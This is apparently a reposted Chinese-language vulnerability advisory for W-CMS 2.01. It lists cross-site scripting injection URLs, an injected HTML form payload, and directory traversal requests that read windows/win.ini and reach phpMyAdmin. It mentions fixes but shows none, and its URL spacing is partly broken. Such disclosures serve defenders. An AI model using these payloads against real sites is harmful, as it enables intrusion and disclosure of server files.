标题: W-Cms Multiple Vulnerability 作者: th3.g4m3_0v3r 开发这网站:http://w-cms.info/ 下载 地址: http://code.google.com/p/wcms/ 影响版本: [2.01] 测试平台: Window 7 W-CMS cross site scripting _______________ 缺陷连接__________\/_____________________ _______________ http://www.2cto.com /index.php?bid=1&COMMENT=1 "XSS" http://www.2cto.com /?p=3"XSS" http://www.2cto.com /?bid=5&p=1"XSS" http://www.2cto.com /?p=3<FORM action="Default. asp ?PageId=-1" method=POST id=searchFORMname=searchFORM style="margin:0;padding:0"><INPUT type="hidden" value="" name="txtSEARCH"></FORM> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ directory traversal attacks This script is possibly vulnerable to directory traversal attacks http://www.2cto.com /wcms-2.01_2/?p= windows /win.ini http://www.2cto.com /wcms-2.01_2/?p=phpMyAdmin/db_create.php
查看更多关于w-CMS 2.01多个缺陷及修复 - 网站安全 - 自学php的详细内容...